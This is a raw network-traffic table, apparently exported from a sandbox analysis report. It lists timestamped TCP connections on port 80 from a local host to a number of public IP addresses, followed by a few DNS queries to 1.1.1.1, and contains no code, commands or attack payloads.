                                                                                                                                                                                                                                    Dec 31, 2024 09:06:07.046838045 CET804981144.221.84.105192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:07.046936035 CET4981180192.168.2.444.221.84.105
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:07.071906090 CET4981180192.168.2.444.221.84.105
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:07.071949959 CET4981180192.168.2.444.221.84.105
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:07.077157021 CET804981144.221.84.105192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:07.077168941 CET804981144.221.84.105192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:07.499385118 CET804981144.221.84.105192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:07.499532938 CET804981144.221.84.105192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:07.499589920 CET4981180192.168.2.444.221.84.105
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:07.501940966 CET4981180192.168.2.444.221.84.105
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:07.506767988 CET804981144.221.84.105192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:07.634212017 CET4981680192.168.2.418.141.10.107
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:07.639134884 CET804981618.141.10.107192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:07.641972065 CET4981680192.168.2.418.141.10.107
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:07.642390013 CET4981680192.168.2.418.141.10.107
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:07.642425060 CET4981680192.168.2.418.141.10.107
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:07.647228003 CET804981618.141.10.107192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:07.647238016 CET804981618.141.10.107192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.000380039 CET804981618.141.10.107192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.000498056 CET804981618.141.10.107192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.000533104 CET4981680192.168.2.418.141.10.107
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.000614882 CET4981680192.168.2.418.141.10.107
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.005378008 CET804981618.141.10.107192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.138058901 CET4974680192.168.2.472.52.178.23
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.138293028 CET4982780192.168.2.472.52.178.23
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.143135071 CET804974672.52.178.23192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.143148899 CET804982772.52.178.23192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.143196106 CET4974680192.168.2.472.52.178.23
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.143225908 CET4982780192.168.2.472.52.178.23
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.143364906 CET4982780192.168.2.472.52.178.23
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.143390894 CET4982780192.168.2.472.52.178.23
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.148173094 CET804982772.52.178.23192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.148183107 CET804982772.52.178.23192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.671380043 CET804982772.52.178.23192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.788249969 CET4983180192.168.2.4199.59.243.227
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.795670033 CET8049831199.59.243.227192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.796890974 CET4983180192.168.2.4199.59.243.227
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.797213078 CET4983180192.168.2.4199.59.243.227
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.802782059 CET8049831199.59.243.227192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:09.858335972 CET4982780192.168.2.472.52.178.23
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.276500940 CET8049831199.59.243.227192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.276513100 CET8049831199.59.243.227192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.276559114 CET4983180192.168.2.4199.59.243.227
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.410396099 CET4982780192.168.2.472.52.178.23
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.410396099 CET4982780192.168.2.472.52.178.23
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.415237904 CET804982772.52.178.23192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.415251017 CET804982772.52.178.23192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.556740999 CET804982772.52.178.23192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.557439089 CET4983180192.168.2.4199.59.243.227
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.562232018 CET8049831199.59.243.227192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.663001060 CET8049831199.59.243.227192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.663018942 CET8049831199.59.243.227192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.663074017 CET4983180192.168.2.4199.59.243.227
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.748964071 CET4982780192.168.2.472.52.178.23
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.841712952 CET4984080192.168.2.434.246.200.160
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.846610069 CET804984034.246.200.160192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.846677065 CET4984080192.168.2.434.246.200.160
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.846945047 CET4984080192.168.2.434.246.200.160
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.846945047 CET4984080192.168.2.434.246.200.160
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.851828098 CET804984034.246.200.160192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.851840973 CET804984034.246.200.160192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:10.889987946 CET4984080192.168.2.434.246.200.160
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:11.033562899 CET4984180192.168.2.434.246.200.160
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:11.038382053 CET804984134.246.200.160192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:11.038474083 CET4984180192.168.2.434.246.200.160
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:11.038718939 CET4984180192.168.2.434.246.200.160
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:11.038765907 CET4984180192.168.2.434.246.200.160
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:11.043533087 CET804984134.246.200.160192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:11.043544054 CET804984134.246.200.160192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:11.786493063 CET804984134.246.200.160192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:11.786567926 CET804984134.246.200.160192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:11.786622047 CET4984180192.168.2.434.246.200.160
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:11.789519072 CET4984180192.168.2.434.246.200.160
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:11.794660091 CET804984134.246.200.160192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:11.878324032 CET4984780192.168.2.434.227.7.138
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:11.883126974 CET804984734.227.7.138192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:11.883205891 CET4984780192.168.2.434.227.7.138
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:11.883486986 CET4984780192.168.2.434.227.7.138
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:11.883498907 CET4984780192.168.2.434.227.7.138
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:11.888257980 CET804984734.227.7.138192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:11.888268948 CET804984734.227.7.138192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:12.339238882 CET804984734.227.7.138192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:12.339374065 CET4984780192.168.2.434.227.7.138
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:12.339406013 CET804984734.227.7.138192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:12.339657068 CET4984780192.168.2.434.227.7.138
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:12.344238043 CET804984734.227.7.138192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:12.518874884 CET4985380192.168.2.4208.117.43.225
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:12.523679018 CET8049853208.117.43.225192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:12.523734093 CET4985380192.168.2.4208.117.43.225
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:12.524959087 CET4985380192.168.2.4208.117.43.225
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:12.524979115 CET4985380192.168.2.4208.117.43.225
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:12.530139923 CET8049853208.117.43.225192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:12.530153036 CET8049853208.117.43.225192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:13.006155968 CET8049853208.117.43.225192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:13.077657938 CET4985380192.168.2.4208.117.43.225
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:13.077694893 CET4985380192.168.2.4208.117.43.225
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:13.082531929 CET8049853208.117.43.225192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:13.082544088 CET8049853208.117.43.225192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:13.193420887 CET8049853208.117.43.225192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:13.358396053 CET4985380192.168.2.4208.117.43.225
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:13.452743053 CET4985980192.168.2.413.251.16.150
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:13.457570076 CET804985913.251.16.150192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:13.457634926 CET4985980192.168.2.413.251.16.150
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:13.457752943 CET4985980192.168.2.413.251.16.150
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:13.457767963 CET4985980192.168.2.413.251.16.150
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:13.462589979 CET804985913.251.16.150192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:13.462604046 CET804985913.251.16.150192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:14.906455994 CET804985913.251.16.150192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:14.906757116 CET804985913.251.16.150192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:14.906825066 CET4985980192.168.2.413.251.16.150
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:14.917974949 CET4985980192.168.2.413.251.16.150
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:14.922804117 CET804985913.251.16.150192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:15.142847061 CET4987180192.168.2.444.221.84.105
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:15.147665024 CET804987144.221.84.105192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:15.147722006 CET4987180192.168.2.444.221.84.105
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:15.147855997 CET4987180192.168.2.444.221.84.105
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:15.147881985 CET4987180192.168.2.444.221.84.105
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:15.152679920 CET804987144.221.84.105192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:15.152690887 CET804987144.221.84.105192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:15.611007929 CET804987144.221.84.105192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:15.611088991 CET804987144.221.84.105192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:15.611140966 CET4987180192.168.2.444.221.84.105
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:15.611234903 CET4987180192.168.2.444.221.84.105
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:15.617336035 CET804987144.221.84.105192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:15.872549057 CET4987680192.168.2.454.244.188.177
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:15.877299070 CET804987654.244.188.177192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:15.877368927 CET4987680192.168.2.454.244.188.177
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:15.879801989 CET4987680192.168.2.454.244.188.177
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:15.879898071 CET4987680192.168.2.454.244.188.177
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:15.884533882 CET804987654.244.188.177192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:15.884650946 CET804987654.244.188.177192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:16.579987049 CET804987654.244.188.177192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:16.580111027 CET804987654.244.188.177192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:16.580163956 CET4987680192.168.2.454.244.188.177
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:16.588903904 CET4987680192.168.2.454.244.188.177
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:16.593667984 CET804987654.244.188.177192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:16.773511887 CET4988380192.168.2.435.164.78.200
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:16.778351068 CET804988335.164.78.200192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:16.778681993 CET4988380192.168.2.435.164.78.200
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:16.779573917 CET4988380192.168.2.435.164.78.200
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:16.779587030 CET4988380192.168.2.435.164.78.200
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:16.784394026 CET804988335.164.78.200192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:16.784404993 CET804988335.164.78.200192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:17.510077953 CET804988335.164.78.200192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:17.510193110 CET804988335.164.78.200192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:17.510848999 CET4988380192.168.2.435.164.78.200
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:17.569150925 CET4988380192.168.2.435.164.78.200
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:17.574513912 CET804988335.164.78.200192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:17.911372900 CET4989180192.168.2.43.94.10.34
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:17.916096926 CET80498913.94.10.34192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:17.916898012 CET4989180192.168.2.43.94.10.34
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:17.916960955 CET4989180192.168.2.43.94.10.34
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:17.916976929 CET4989180192.168.2.43.94.10.34
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:17.921694994 CET80498913.94.10.34192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:17.921704054 CET80498913.94.10.34192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:18.390219927 CET80498913.94.10.34192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:18.390333891 CET80498913.94.10.34192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:18.390419006 CET4989180192.168.2.43.94.10.34
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:18.391444921 CET4989180192.168.2.43.94.10.34
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:18.396183968 CET80498913.94.10.34192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:18.625432968 CET4989580192.168.2.4165.160.13.20
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:18.630242109 CET8049895165.160.13.20192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:18.630301952 CET4989580192.168.2.4165.160.13.20
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:18.630624056 CET4989580192.168.2.4165.160.13.20
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:18.630673885 CET4989580192.168.2.4165.160.13.20
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:18.635370016 CET8049895165.160.13.20192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:18.635485888 CET8049895165.160.13.20192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:19.381952047 CET8049895165.160.13.20192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:19.425441980 CET4989580192.168.2.4165.160.13.20
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:19.425476074 CET4989580192.168.2.4165.160.13.20
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:19.430294991 CET8049895165.160.13.20192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:19.430306911 CET8049895165.160.13.20192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:19.607393026 CET8049895165.160.13.20192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:19.686490059 CET4989580192.168.2.4165.160.13.20
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:20.662735939 CET8049831199.59.243.227192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:20.664279938 CET4983180192.168.2.4199.59.243.227
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:20.694036961 CET4983180192.168.2.4199.59.243.227
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:20.698791027 CET8049831199.59.243.227192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:20.838433981 CET4991080192.168.2.454.244.188.177
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:20.843272924 CET804991054.244.188.177192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:20.843358994 CET4991080192.168.2.454.244.188.177
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:20.843485117 CET4991080192.168.2.454.244.188.177
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:20.843498945 CET4991080192.168.2.454.244.188.177
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:20.848248005 CET804991054.244.188.177192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:20.848257065 CET804991054.244.188.177192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:21.574311972 CET804991054.244.188.177192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:21.574368954 CET804991054.244.188.177192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:21.574455023 CET4991080192.168.2.454.244.188.177
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:21.575946093 CET4991080192.168.2.454.244.188.177
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:21.580801010 CET804991054.244.188.177192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:21.959875107 CET4985380192.168.2.4208.117.43.225
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:21.960170984 CET4991680192.168.2.4208.117.43.225
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:21.964943886 CET8049853208.117.43.225192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:21.965004921 CET8049916208.117.43.225192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:21.965015888 CET4985380192.168.2.4208.117.43.225
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:21.965069056 CET4991680192.168.2.4208.117.43.225
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:21.965406895 CET4991680192.168.2.4208.117.43.225
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:21.965450048 CET4991680192.168.2.4208.117.43.225
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:21.970223904 CET8049916208.117.43.225192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:21.970235109 CET8049916208.117.43.225192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:22.477936029 CET8049916208.117.43.225192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:22.525209904 CET4991680192.168.2.4208.117.43.225
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:22.525211096 CET4991680192.168.2.4208.117.43.225
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:22.530132055 CET8049916208.117.43.225192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:22.530157089 CET8049916208.117.43.225192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:22.644244909 CET8049916208.117.43.225192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:22.751463890 CET4991680192.168.2.4208.117.43.225
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:23.808870077 CET4992780192.168.2.418.246.231.120
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:23.813714981 CET804992718.246.231.120192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:23.813909054 CET4992780192.168.2.418.246.231.120
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:23.814193964 CET4992780192.168.2.418.246.231.120
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:23.814219952 CET4992780192.168.2.418.246.231.120
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:23.818944931 CET804992718.246.231.120192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:23.818954945 CET804992718.246.231.120192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:24.525293112 CET804992718.246.231.120192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:24.525434971 CET804992718.246.231.120192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:24.525480986 CET4992780192.168.2.418.246.231.120
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:24.543677092 CET4992780192.168.2.418.246.231.120
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:24.548434019 CET804992718.246.231.120192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:25.100718975 CET4993880192.168.2.454.244.188.177
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:25.105559111 CET804993854.244.188.177192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:25.105655909 CET4993880192.168.2.454.244.188.177
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:25.105933905 CET4993880192.168.2.454.244.188.177
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:25.106216908 CET4993880192.168.2.454.244.188.177
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:25.110734940 CET804993854.244.188.177192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:25.110982895 CET804993854.244.188.177192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:25.746792078 CET8049741132.226.8.169192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:25.746845961 CET4974180192.168.2.4132.226.8.169
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:51.130354881 CET8049895165.160.13.20192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:51.130405903 CET4989580192.168.2.4165.160.13.20
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:51.131359100 CET4989580192.168.2.4165.160.13.20
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:51.136054993 CET8049895165.160.13.20192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:53.680003881 CET804993854.244.188.177192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:53.680062056 CET4993880192.168.2.454.244.188.177
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:53.686476946 CET4993880192.168.2.454.244.188.177
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:53.688967943 CET5005080192.168.2.454.244.188.177
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:53.691869974 CET804993854.244.188.177192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:53.694236994 CET805005054.244.188.177192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:53.694310904 CET5005080192.168.2.454.244.188.177
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:53.694452047 CET5005080192.168.2.454.244.188.177
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:53.694477081 CET5005080192.168.2.454.244.188.177
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:53.699255943 CET805005054.244.188.177192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:53.699269056 CET805005054.244.188.177192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:57.221101046 CET4982780192.168.2.472.52.178.23
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:57.221174002 CET4974880192.168.2.413.248.148.254
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:57.221174002 CET4991680192.168.2.4208.117.43.225
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:57.226284027 CET804982772.52.178.23192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:57.226356983 CET4982780192.168.2.472.52.178.23
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:57.226630926 CET804974813.248.148.254192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:57.226660013 CET8049916208.117.43.225192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:57.226697922 CET4974880192.168.2.413.248.148.254
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:57.226753950 CET4991680192.168.2.4208.117.43.225
                                                                                                                                                                                                                                    Dec 31, 2024 09:07:00.765197039 CET4974180192.168.2.4132.226.8.169
                                                                                                                                                                                                                                    Dec 31, 2024 09:07:00.770078897 CET8049741132.226.8.169192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:07:15.111534119 CET805005054.244.188.177192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:07:15.112529039 CET5005080192.168.2.454.244.188.177
                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:06.261581898 CET6117453192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:06.269162893 CET53611741.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:06.619533062 CET6000053192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:06.627377987 CET53600001.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:07.688419104 CET5823753192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:07.695111990 CET53582371.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:08.009258032 CET5938153192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:08.016556978 CET53593811.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:09.794758081 CET6042053192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:09.802153111 CET53604201.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:10.811642885 CET5805053192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:10.818840027 CET53580501.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:11.347551107 CET5741853192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:11.354835987 CET53574181.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:12.391901970 CET6534753192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:12.399024010 CET53653471.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:13.097170115 CET5932853192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:13.106596947 CET53593281.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:14.015062094 CET6321953192.168.2.41.1.1.1
